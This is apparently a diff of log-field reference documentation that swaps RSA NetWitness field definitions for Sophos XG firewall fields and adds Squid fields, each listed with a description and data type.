traffic. + type: keyword -- -*`rsa.network.vlan_name`*:: +*`sophos.xg.category`*:: + -- -This key should only be used to capture the name of the Virtual LAN +IPS signature category. + type: keyword -- - -*`rsa.investigations.ec_activity`*:: +*`sophos.xg.target`*:: + -- -This key captures the particular event activity(Ex:Logoff) +Platform of the traffic. + type: keyword -- -*`rsa.investigations.ec_theme`*:: +*`sophos.xg.eventid`*:: + -- -This key captures the Theme of a particular Event(Ex:Authentication) +ATP Evenet ID + type: keyword -- -*`rsa.investigations.ec_subject`*:: +*`sophos.xg.ep_uuid`*:: + -- -This key captures the Subject of a particular Event(Ex:User) +Endpoint UUID + type: keyword -- -*`rsa.investigations.ec_outcome`*:: +*`sophos.xg.threatname`*:: + -- -This key captures the outcome of a particular Event(Ex:Success) +ATP threatname + type: keyword -- -*`rsa.investigations.event_cat`*:: +*`sophos.xg.sourceip`*:: + -- -This key captures the Event category number +Original source IP address of traffic -type: long + +type: ip -- -*`rsa.investigations.event_cat_name`*:: +*`sophos.xg.destinationip`*:: + -- -This key captures the event category name corresponding to the event cat code +Original destination IP address of traffic -type: keyword + +type: ip -- -*`rsa.investigations.event_vcat`*:: +*`sophos.xg.login_user`*:: + -- -This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. +ATP login user + type: keyword -- -*`rsa.investigations.analysis_file`*:: +*`sophos.xg.eventtype`*:: + -- -This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file +ATP event type + type: keyword -- -*`rsa.investigations.analysis_service`*:: +*`sophos.xg.execution_path`*:: + -- -This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service +ATP execution path + type: keyword -- -*`rsa.investigations.analysis_session`*:: +*`sophos.xg.av_policy_name`*:: + -- -This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session +Malware scanning policy name which is applied on the traffic + type: keyword -- -*`rsa.investigations.boc`*:: +*`sophos.xg.from_email_address`*:: + -- -This is used to capture behaviour of compromise +Sender email address + type: keyword -- -*`rsa.investigations.eoc`*:: +*`sophos.xg.to_email_address`*:: + -- -This is used to capture Enablers of Compromise +Receipeint email address + type: keyword -- -*`rsa.investigations.inv_category`*:: +*`sophos.xg.subject`*:: + -- -This used to capture investigation category +Email subject + type: keyword -- -*`rsa.investigations.inv_context`*:: +*`sophos.xg.mailsize`*:: + -- -This used to capture investigation context +mailsize -type: keyword + +type: integer -- -*`rsa.investigations.ioc`*:: +*`sophos.xg.virus`*:: + -- -This is key capture indicator of compromise +virus name + type: keyword -- - -*`rsa.counters.dclass_c1`*:: +*`sophos.xg.FTP_url`*:: + -- -This is a generic counter key that should be used with the label dclass.c1.str only +FTP URL from which virus was downloaded -type: long + +type: keyword -- -*`rsa.counters.dclass_c2`*:: +*`sophos.xg.FTP_direction`*:: + -- -This is a generic counter key that should be used with the label dclass.c2.str only +Direction of FTP transfer: Upload or Download -type: long + +type: keyword -- -*`rsa.counters.event_counter`*:: +*`sophos.xg.filesize`*:: + -- -This is used to capture the number of times an event repeated +Size of the file that contained virus -type: long + +type: integer -- -*`rsa.counters.dclass_r1`*:: +*`sophos.xg.filepath`*:: + -- -This is a generic ratio key that should be used with the label dclass.r1.str only +Path of the file containing virus + type: keyword -- -*`rsa.counters.dclass_c3`*:: +*`sophos.xg.filename`*:: + -- -This is a generic counter key that should be used with the label dclass.c3.str only +File name associated with the event -type: long + +type: keyword -- -*`rsa.counters.dclass_c1_str`*:: +*`sophos.xg.ftpcommand`*:: + -- -This is a generic counter string key that should be used with the label dclass.c1 only +FTP command used when virus was found + type: keyword -- -*`rsa.counters.dclass_c2_str`*:: +*`sophos.xg.url`*:: + -- -This is a generic counter string key that should be used with the label dclass.c2 only +URL from which virus was downloaded + type: keyword -- -*`rsa.counters.dclass_r1_str`*:: +*`sophos.xg.domainname`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r1 only +Domain from which virus was downloaded + type: keyword -- -*`rsa.counters.dclass_r2`*:: +*`sophos.xg.quarantine`*:: + -- -This is a generic ratio key that should be used with the label dclass.r2.str only +Path and filename of the file quarantined + type: keyword -- -*`rsa.counters.dclass_c3_str`*:: +*`sophos.xg.src_domainname`*:: + -- -This is a generic counter string key that should be used with the label dclass.c3 only +Sender domain name + type: keyword -- -*`rsa.counters.dclass_r3`*:: +*`sophos.xg.dst_domainname`*:: + -- -This is a generic ratio key that should be used with the label dclass.r3.str only +Receiver domain name + type: keyword -- -*`rsa.counters.dclass_r2_str`*:: +*`sophos.xg.reason`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r2 only +Reason why the record was detected as spam/malicious + type: keyword -- -*`rsa.counters.dclass_r3_str`*:: +*`sophos.xg.referer`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r3 only +Referer + type: keyword -- - -*`rsa.identity.auth_method`*:: +*`sophos.xg.spamaction`*:: + -- -This key is used to capture authentication methods used only +Spam Action + type: keyword -- -*`rsa.identity.user_role`*:: +*`sophos.xg.mailid`*:: + -- -This key is used to capture the Role of a user only +mailid + type: keyword -- -*`rsa.identity.dn`*:: +*`sophos.xg.quarantine_reason`*:: + -- -X.500 (LDAP) Distinguished Name +Quarantine reason + type: keyword -- -*`rsa.identity.logon_type`*:: +*`sophos.xg.status_code`*:: + -- -This key is used to capture the type of logon method used. +Status code + type: keyword -- -*`rsa.identity.profile`*:: +*`sophos.xg.override_token`*:: + -- -This key is used to capture the user profile +Override token + type: keyword -- -*`rsa.identity.accesses`*:: +*`sophos.xg.con_id`*:: + -- -This key is used to capture actual privileges used in accessing an object +Unique identifier of connection -type: keyword + +type: integer -- -*`rsa.identity.realm`*:: +*`sophos.xg.override_authorizer`*:: + -- -Radius realm or similar grouping of accounts +Override authorizer + type: keyword -- -*`rsa.identity.user_sid_dst`*:: +*`sophos.xg.transactionid`*:: + -- -This key captures Destination User Session ID +Transaction ID of the AV scan. + type: keyword -- -*`rsa.identity.dn_src`*:: +*`sophos.xg.upload_file_type`*:: + -- -An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn +Upload file type + type: keyword -- -*`rsa.identity.org`*:: +*`sophos.xg.upload_file_name`*:: + -- -This key captures the User organization +Upload file name + type: keyword -- -*`rsa.identity.dn_dst`*:: +*`sophos.xg.httpresponsecode`*:: + -- -An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn +code of HTTP response -type: keyword + +type: long -- -*`rsa.identity.firstname`*:: +*`sophos.xg.user_gp`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +Group name to which the user belongs. + type: keyword -- -*`rsa.identity.lastname`*:: +*`sophos.xg.category_type`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information +Type of category under which website falls + type: keyword -- -*`rsa.identity.user_dept`*:: +*`sophos.xg.download_file_type`*:: + -- -User's Department Names only +Download file type + type: keyword -- -*`rsa.identity.user_sid_src`*:: +*`sophos.xg.exceptions`*:: + -- -This key captures Source User Session ID +List of the checks excluded by web exceptions. + type: keyword -- -*`rsa.identity.federated_sp`*:: +*`sophos.xg.contenttype`*:: + -- -This key is the Federated Service Provider. This is the application requesting authentication. +Type of the content + type: keyword -- -*`rsa.identity.federated_idp`*:: +*`sophos.xg.override_name`*:: + -- -This key is the federated Identity Provider. This is the server providing the authentication. +Override name + type: keyword -- -*`rsa.identity.logon_type_desc`*:: +*`sophos.xg.activityname`*:: + -- -This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. +Web policy activity that matched and caused the policy result. + type: keyword -- -*`rsa.identity.middlename`*:: +*`sophos.xg.download_file_name`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information +Download file name + type: keyword -- -*`rsa.identity.password`*:: +*`sophos.xg.sha1sum`*:: + -- -This key is for Passwords seen in any session, plain text or encrypted +SHA1 checksum of the item being analyzed + type: keyword -- -*`rsa.identity.host_role`*:: +*`sophos.xg.message_id`*:: + -- -This key should only be used to capture the role of a Host Machine +Message ID + type: keyword -- -*`rsa.identity.ldap`*:: +*`sophos.xg.connid`*:: + -- -This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context +Connection ID + type: keyword -- -*`rsa.identity.ldap_query`*:: +*`sophos.xg.message`*:: + -- -This key is the Search criteria from an LDAP search +Message + type: keyword -- -*`rsa.identity.ldap_response`*:: +*`sophos.xg.email_subject`*:: + -- -This key is to capture Results from an LDAP search +Email Subject + type: keyword -- -*`rsa.identity.owner`*:: +*`sophos.xg.file_path`*:: + -- -This is used to capture username the process or service is running as, the author of the task +File path + type: keyword -- -*`rsa.identity.service_account`*:: +*`sophos.xg.dstdomain`*:: + -- -This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage +Destination Domain + type: keyword -- - -*`rsa.email.email_dst`*:: +*`sophos.xg.file_size`*:: + -- -This key is used to capture the Destination email address only, when the destination context is not clear use email +File Size -type: keyword + +type: integer -- -*`rsa.email.email_src`*:: +*`sophos.xg.transaction_id`*:: + -- -This key is used to capture the source email address only, when the source context is not clear use email +Transaction ID + type: keyword -- -*`rsa.email.subject`*:: +*`sophos.xg.website`*:: + -- -This key is used to capture the subject string from an Email only. +Website + type: keyword -- -*`rsa.email.email`*:: +*`sophos.xg.file_name`*:: + -- -This key is used to capture a generic email address where the source or destination context is not clear +Filename + type: keyword -- -*`rsa.email.trans_from`*:: +*`sophos.xg.context_prefix`*:: + -- -Deprecated key defined only in table map. +Content Prefix + type: keyword -- -*`rsa.email.trans_to`*:: +*`sophos.xg.site_category`*:: + -- -Deprecated key defined only in table map. +Site Category + type: keyword -- - -*`rsa.file.privilege`*:: +*`sophos.xg.context_suffix`*:: + -- -Deprecated, use permissions +Context Suffix + type: keyword -- -*`rsa.file.attachment`*:: +*`sophos.xg.dictionary_name`*:: + -- -This key captures the attachment file name +Dictionary Name + type: keyword -- -*`rsa.file.filesystem`*:: +*`sophos.xg.action`*:: + -- +Event Action + + type: keyword -- -*`rsa.file.binary`*:: +*`sophos.xg.user`*:: + -- -Deprecated key defined only in table map. +User + type: keyword -- -*`rsa.file.filename_dst`*:: +*`sophos.xg.context_match`*:: + -- -This is used to capture name of the file targeted by the action +Context Match + type: keyword -- -*`rsa.file.filename_src`*:: +*`sophos.xg.direction`*:: + -- -This is used to capture name of the parent filename, the file which performed the action +Direction + type: keyword -- -*`rsa.file.filename_tmp`*:: +*`sophos.xg.auth_client`*:: + -- +Auth Client + + type: keyword -- -*`rsa.file.directory_dst`*:: +*`sophos.xg.auth_mechanism`*:: + -- -This key is used to capture the directory of the target process or file +Auth mechanism + type: keyword -- -*`rsa.file.directory_src`*:: +*`sophos.xg.connectionname`*:: + -- -This key is used to capture the directory of the source process or file +Connectionname + type: keyword -- -*`rsa.file.file_entropy`*:: +*`sophos.xg.remotenetwork`*:: + -- -This is used to capture entropy vale of a file +remotenetwork -type: double + +type: keyword -- -*`rsa.file.file_vendor`*:: +*`sophos.xg.localgateway`*:: + -- -This is used to capture Company name of file located in version_info +Localgateway + type: keyword -- -*`rsa.file.task_name`*:: +*`sophos.xg.localnetwork`*:: + -- -This is used to capture name of the task +Localnetwork + type: keyword -- - -*`rsa.web.fqdn`*:: +*`sophos.xg.connectiontype`*:: + -- -Fully Qualified Domain Names +Connectiontype + type: keyword -- -*`rsa.web.web_cookie`*:: +*`sophos.xg.oldversion`*:: + -- -This key is used to capture the Web cookies specifically. +Oldversion + type: keyword -- -*`rsa.web.alias_host`*:: +*`sophos.xg.newversion`*:: + -- +Newversion + + type: keyword -- -*`rsa.web.reputation_num`*:: +*`sophos.xg.ipaddress`*:: + -- -Reputation Number of an entity. Typically used for Web Domains +Ipaddress -type: double + +type: keyword -- -*`rsa.web.web_ref_domain`*:: +*`sophos.xg.client_physical_address`*:: + -- -Web referer's domain +Client physical address + type: keyword -- -*`rsa.web.web_ref_query`*:: +*`sophos.xg.client_host_name`*:: + -- -This key captures Web referer's query portion of the URL +Client host name + type: keyword -- -*`rsa.web.remote_domain`*:: +*`sophos.xg.raw_data`*:: + -- +Raw data + + type: keyword -- -*`rsa.web.web_ref_page`*:: +*`sophos.xg.Mode`*:: + -- -This key captures Web referer's page information +Mode + type: keyword -- -*`rsa.web.web_ref_root`*:: +*`sophos.xg.sessionid`*:: + -- -Web referer's root URL path +Sessionid + type: keyword -- -*`rsa.web.cn_asn_dst`*:: +*`sophos.xg.starttime`*:: + -- -type: keyword +Starttime --- -*`rsa.web.cn_rpackets`*:: -+ --- -type: keyword +type: date -- -*`rsa.web.urlpage`*:: +*`sophos.xg.remote_ip`*:: + -- -type: keyword +Remote IP + + +type: ip -- -*`rsa.web.urlroot`*:: +*`sophos.xg.timestamp`*:: + -- -type: keyword +timestamp + + +type: date -- -*`rsa.web.p_url`*:: +*`sophos.xg.SysLog_SERVER_NAME`*:: + -- +SysLog SERVER NAME + + type: keyword -- -*`rsa.web.p_user_agent`*:: +*`sophos.xg.backup_mode`*:: + -- +Backup mode + + type: keyword -- -*`rsa.web.p_web_cookie`*:: +*`sophos.xg.source`*:: + -- +Source + + type: keyword -- -*`rsa.web.p_web_method`*:: +*`sophos.xg.server`*:: + -- +Server + + type: keyword -- -*`rsa.web.p_web_referer`*:: +*`sophos.xg.host`*:: + -- +Host + + type: keyword -- -*`rsa.web.web_extension_tmp`*:: +*`sophos.xg.responsetime`*:: + -- -type: keyword +Responsetime + + +type: long -- -*`rsa.web.web_page`*:: +*`sophos.xg.cookie`*:: + -- +cookie + + type: keyword -- - -*`rsa.threat.threat_category`*:: +*`sophos.xg.querystring`*:: + -- -This key captures Threat Name/Threat Category/Categorization of alert +querystring + type: keyword -- -*`rsa.threat.threat_desc`*:: +*`sophos.xg.extra`*:: + -- -This key is used to capture the threat description from the session directly or inferred +extra + type: keyword -- -*`rsa.threat.alert`*:: +*`sophos.xg.PHPSESSID`*:: + -- -This key is used to capture name of the alert +PHPSESSID + type: keyword -- -*`rsa.threat.threat_source`*:: +*`sophos.xg.start_time`*:: + -- -This key is used to capture source of the threat +Start time -type: keyword --- +type: date +-- -*`rsa.crypto.crypto`*:: +*`sophos.xg.eventtime`*:: + -- -This key is used to capture the Encryption Type or Encryption Key only +Event time -type: keyword + +type: date -- -*`rsa.crypto.cipher_src`*:: +*`sophos.xg.red_id`*:: + -- -This key is for Source (Client) Cipher +RED ID + type: keyword -- -*`rsa.crypto.cert_subject`*:: +*`sophos.xg.branch_name`*:: + -- -This key is used to capture the Certificate organization only +Branch Name + type: keyword -- -*`rsa.crypto.peer`*:: +*`sophos.xg.updatedip`*:: + -- -This key is for Encryption peer's IP Address +updatedip -type: keyword + +type: ip -- -*`rsa.crypto.cipher_size_src`*:: +*`sophos.xg.idle_cpu`*:: + -- -This key captures Source (Client) Cipher Size +idle ## -type: long + +type: float -- -*`rsa.crypto.ike`*:: +*`sophos.xg.system_cpu`*:: + -- -IKE negotiation phase. +system -type: keyword + +type: float -- -*`rsa.crypto.scheme`*:: +*`sophos.xg.user_cpu`*:: + -- -This key captures the Encryption scheme used +system -type: keyword + +type: float -- -*`rsa.crypto.peer_id`*:: +*`sophos.xg.used`*:: + -- -This key is for Encryption peer’s identity +used -type: keyword + +type: integer -- -*`rsa.crypto.sig_type`*:: +*`sophos.xg.unit`*:: + -- -This key captures the Signature Type +unit + type: keyword -- -*`rsa.crypto.cert_issuer`*:: +*`sophos.xg.total_memory`*:: + -- -type: keyword +Total Memory + + +type: integer -- -*`rsa.crypto.cert_host_name`*:: +*`sophos.xg.free`*:: + -- -Deprecated key defined only in table map. +free -type: keyword + +type: integer -- -*`rsa.crypto.cert_error`*:: +*`sophos.xg.transmittederrors`*:: + -- -This key captures the Certificate Error String +transmitted errors + type: keyword -- -*`rsa.crypto.cipher_dst`*:: +*`sophos.xg.receivederrors`*:: + -- -This key is for Destination (Server) Cipher +received errors + type: keyword -- -*`rsa.crypto.cipher_size_dst`*:: +*`sophos.xg.receivedkbits`*:: + -- -This key captures Destination (Server) Cipher Size +received kbits + type: long -- -*`rsa.crypto.ssl_ver_src`*:: +*`sophos.xg.transmittedkbits`*:: + -- -Deprecated, use version +transmitted kbits -type: keyword + +type: long -- -*`rsa.crypto.d_certauth`*:: +*`sophos.xg.transmitteddrops`*:: + -- -type: keyword +transmitted drops --- -*`rsa.crypto.s_certauth`*:: -+ --- -type: keyword +type: long -- -*`rsa.crypto.ike_cookie1`*:: +*`sophos.xg.receiveddrops`*:: + -- -ID of the negotiation — sent for ISAKMP Phase One +received drops -type: keyword + +type: long -- -*`rsa.crypto.ike_cookie2`*:: +*`sophos.xg.collisions`*:: + -- -ID of the negotiation — sent for ISAKMP Phase Two +collisions -type: keyword + +type: long -- -*`rsa.crypto.cert_checksum`*:: +*`sophos.xg.interface`*:: + -- +interface + + type: keyword -- -*`rsa.crypto.cert_host_cat`*:: +*`sophos.xg.Configuration`*:: + -- -This key is used for the hostname category value of a certificate +Configuration -type: keyword + +type: float -- -*`rsa.crypto.cert_serial`*:: +*`sophos.xg.Reports`*:: + -- -This key is used to capture the Certificate serial number only +Reports -type: keyword + +type: float -- -*`rsa.crypto.cert_status`*:: +*`sophos.xg.Signature`*:: + -- -This key captures Certificate validation status +Signature -type: keyword + +type: float -- -*`rsa.crypto.ssl_ver_dst`*:: +*`sophos.xg.Temp`*:: + -- -Deprecated, use version +Temp -type: keyword + +type: float -- -*`rsa.crypto.cert_keysize`*:: +*`sophos.xg.users`*:: + -- -type: keyword +users --- -*`rsa.crypto.cert_username`*:: -+ --- type: keyword -- -*`rsa.crypto.https_insact`*:: +*`sophos.xg.ssid`*:: + -- -type: keyword +ssid --- -*`rsa.crypto.https_valid`*:: -+ --- type: keyword -- -*`rsa.crypto.cert_ca`*:: +*`sophos.xg.ap`*:: + -- -This key is used to capture the Certificate signing authority only +ap + type: keyword -- -*`rsa.crypto.cert_common`*:: +*`sophos.xg.clients_conn_ssid`*:: + -- -This key is used to capture the Certificate common name only +clients connection ssid + type: keyword -- +[[exported-fields-squid]] +== Squid fields + +squid fields. + -*`rsa.wireless.wlan_ssid`*:: + +*`network.interface.name`*:: + -- -This key is used to capture the ssid of a Wireless Session +Name of the network interface where the traffic has been observed. + type: keyword -- -*`rsa.wireless.access_point`*:: + + +*`rsa.internal.msg`*:: + -- -This key is used to capture the access point name. +This key is used to capture the raw message that comes into the Log Decoder type: keyword -- -*`rsa.wireless.wlan_channel`*:: +*`rsa.internal.messageid`*:: + -- -This is used to capture the channel names - -type: long +type: keyword -- -*`rsa.wireless.wlan_name`*:: +*`rsa.internal.event_desc`*:: + -- -This key captures either WLAN number/name - type: keyword -- - -*`rsa.storage.disk_volume`*:: +*`rsa.internal.message`*:: + -- -A unique name assigned to logical units (volumes) within a physical disk +This key captures the contents of instant messages type: keyword -- -*`rsa.storage.lun`*:: +*`rsa.internal.time`*:: + -- -Logical Unit Number.This key is a very useful concept in Storage. +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. -type: keyword +type: date -- -*`rsa.storage.pwwn`*:: +*`rsa.internal.level`*:: + -- -This uniquely identifies a port on a HBA. +Deprecated key defined only in table map. -type: keyword +type: long -- - -*`rsa.physical.org_dst`*:: +*`rsa.internal.msg_id`*:: + -- -This is used to capture the destination organization based on the GEOPIP Maxmind database. +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.physical.org_src`*:: +*`rsa.internal.msg_vid`*:: + -- -This is used to capture the source organization based on the GEOPIP Maxmind database. +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- - -*`rsa.healthcare.patient_fname`*:: +*`rsa.internal.data`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +Deprecated key defined only in table map. type: keyword -- -*`rsa.healthcare.patient_id`*:: +*`rsa.internal.obj_server`*:: + -- -This key captures the unique ID for a patient +Deprecated key defined only in table map. type: keyword -- -*`rsa.healthcare.patient_lname`*:: +*`rsa.internal.obj_val`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information +Deprecated key defined only in table map. type: keyword -- -*`rsa.healthcare.patient_mname`*:: +*`rsa.internal.resource`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information +Deprecated key defined only in table map. type: keyword -- - -*`rsa.endpoint.host_state`*:: +*`rsa.internal.obj_id`*:: + -- -This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on +Deprecated key defined only in table map. type: keyword -- -*`rsa.endpoint.registry_key`*:: +*`rsa.internal.statement`*:: + -- -This key captures the path to the registry key +Deprecated key defined only in table map. type: keyword -- -*`rsa.endpoint.registry_value`*:: +*`rsa.internal.audit_class`*:: + -- -This key captures values or decorators used within a registry entry +Deprecated key defined only in table map. type: keyword -- -[float] -=== sophos - - - - -[float] -=== xg - -Module for parsing sophosxg syslog. - - - -*`sophos.xg.device`*:: +*`rsa.internal.entry`*:: + -- -device - +Deprecated key defined only in table map. type: keyword -- -*`sophos.xg.date`*:: +*`rsa.internal.hcode`*:: + -- -Date (yyyy-mm-dd) when the event occurred - +Deprecated key defined only in table map. -type: date +type: keyword -- -*`sophos.xg.timezone`*:: +*`rsa.internal.inode`*:: + -- -Time (hh:mm:ss) when the event occurred - +Deprecated key defined only in table map. -type: keyword +type: long -- -*`sophos.xg.device_name`*:: +*`rsa.internal.resource_class`*:: + -- -Model number of the device - +Deprecated key defined only in table map. type: keyword -- -*`sophos.xg.device_id`*:: +*`rsa.internal.dead`*:: + -- -Serial number of the device - +Deprecated key defined only in table map. -type: keyword +type: long -- -*`sophos.xg.log_id`*:: +*`rsa.internal.feed_desc`*:: + -- -Unique 12 characters code (0101011) - +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.log_type`*:: +*`rsa.internal.feed_name`*:: + -- -Type of event e.g. firewall event - +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.log_component`*:: +*`rsa.internal.cid`*:: + -- -Component responsible for logging e.g. Firewall rule - +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.log_subtype`*:: +*`rsa.internal.device_class`*:: + -- -Sub type of event - +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.hb_health`*:: +*`rsa.internal.device_group`*:: + -- -Heartbeat status - +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.priority`*:: +*`rsa.internal.device_host`*:: + -- -Severity level of traffic - +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.status`*:: +*`rsa.internal.device_ip`*:: + -- -Ultimate status of traffic – Allowed or Denied - +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`sophos.xg.duration`*:: +*`rsa.internal.device_ipv6`*:: + -- -Durability of traffic (seconds) - +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: ip -- -*`sophos.xg.fw_rule_id`*:: +*`rsa.internal.device_type`*:: + -- -Firewall Rule ID which is applied on the traffic - +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: integer +type: keyword -- -*`sophos.xg.user_name`*:: +*`rsa.internal.device_type_id`*:: + -- -user_name - +Deprecated key defined only in table map. -type: keyword +type: long -- -*`sophos.xg.user_group`*:: +*`rsa.internal.did`*:: + -- -Group name to which the user belongs - +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.iap`*:: +*`rsa.internal.entropy_req`*:: + -- -Internet Access policy ID applied on the traffic - +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration -type: keyword +type: long -- -*`sophos.xg.ips_policy_id`*:: +*`rsa.internal.entropy_res`*:: + -- -IPS policy ID applied on the traffic - +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration -type: integer +type: long -- -*`sophos.xg.policy_type`*:: +*`rsa.internal.event_name`*:: + -- -Policy type applied to the traffic - +Deprecated key defined only in table map. type: keyword -- -*`sophos.xg.appfilter_policy_id`*:: +*`rsa.internal.feed_category`*:: + -- -Application Filter policy applied on the traffic - +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: integer +type: keyword -- -*`sophos.xg.application_filter_policy`*:: +*`rsa.internal.forward_ip`*:: + -- -Application Filter policy applied on the traffic - +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. -type: integer +type: ip -- -*`sophos.xg.application`*:: +*`rsa.internal.forward_ipv6`*:: + -- -Application name - +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`sophos.xg.application_name`*:: +*`rsa.internal.header_id`*:: + -- -Application name - +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.application_risk`*:: +*`rsa.internal.lc_cid`*:: + -- -Risk level assigned to the application - +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.application_technology`*:: +*`rsa.internal.lc_ctime`*:: + -- -Technology of the application - +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: date -- -*`sophos.xg.application_category`*:: +*`rsa.internal.mcb_req`*:: + -- -Application is resolved by signature or synchronized application - +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`sophos.xg.appresolvedby`*:: +*`rsa.internal.mcb_res`*:: + -- -Technology of the application - +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`sophos.xg.app_is_cloud`*:: +*`rsa.internal.mcbc_req`*:: + -- -Application is Cloud - +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: keyword +type: long -- -*`sophos.xg.in_interface`*:: +*`rsa.internal.mcbc_res`*:: + -- -Interface for incoming traffic, e.g., Port A - +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: keyword +type: long -- -*`sophos.xg.out_interface`*:: +*`rsa.internal.medium`*:: + -- -Interface for outgoing traffic, e.g., Port B - +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session -type: keyword +type: long -- -*`sophos.xg.src_ip`*:: +*`rsa.internal.node_name`*:: + -- -Original source IP address of traffic - +Deprecated key defined only in table map. -type: ip +type: keyword -- -*`sophos.xg.src_mac`*:: +*`rsa.internal.nwe_callback_id`*:: + -- -Original source MAC address of traffic - +This key denotes that event is endpoint related type: keyword -- -*`sophos.xg.src_country_code`*:: +*`rsa.internal.parse_error`*:: + -- -Code of the country to which the source IP belongs - +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.dst_ip`*:: +*`rsa.internal.payload_req`*:: + -- -Original destination IP address of traffic - +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep -type: ip +type: long -- -*`sophos.xg.dst_country_code`*:: +*`rsa.internal.payload_res`*:: + -- -Code of the country to which the destination IP belongs - +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep -type: keyword +type: long -- -*`sophos.xg.protocol`*:: +*`rsa.internal.process_vid_dst`*:: + -- -Protocol number of traffic - +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. type: keyword -- -*`sophos.xg.src_port`*:: +*`rsa.internal.process_vid_src`*:: + -- -Original source port of TCP and UDP traffic - +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. -type: integer +type: keyword -- -*`sophos.xg.dst_port`*:: +*`rsa.internal.rid`*:: + -- -Original destination port of TCP and UDP traffic - +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: integer +type: long -- -*`sophos.xg.icmp_type`*:: +*`rsa.internal.session_split`*:: + -- -ICMP type of ICMP traffic - +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`sophos.xg.icmp_code`*:: +*`rsa.internal.site`*:: + -- -ICMP code of ICMP traffic - +Deprecated key defined only in table map. type: keyword -- 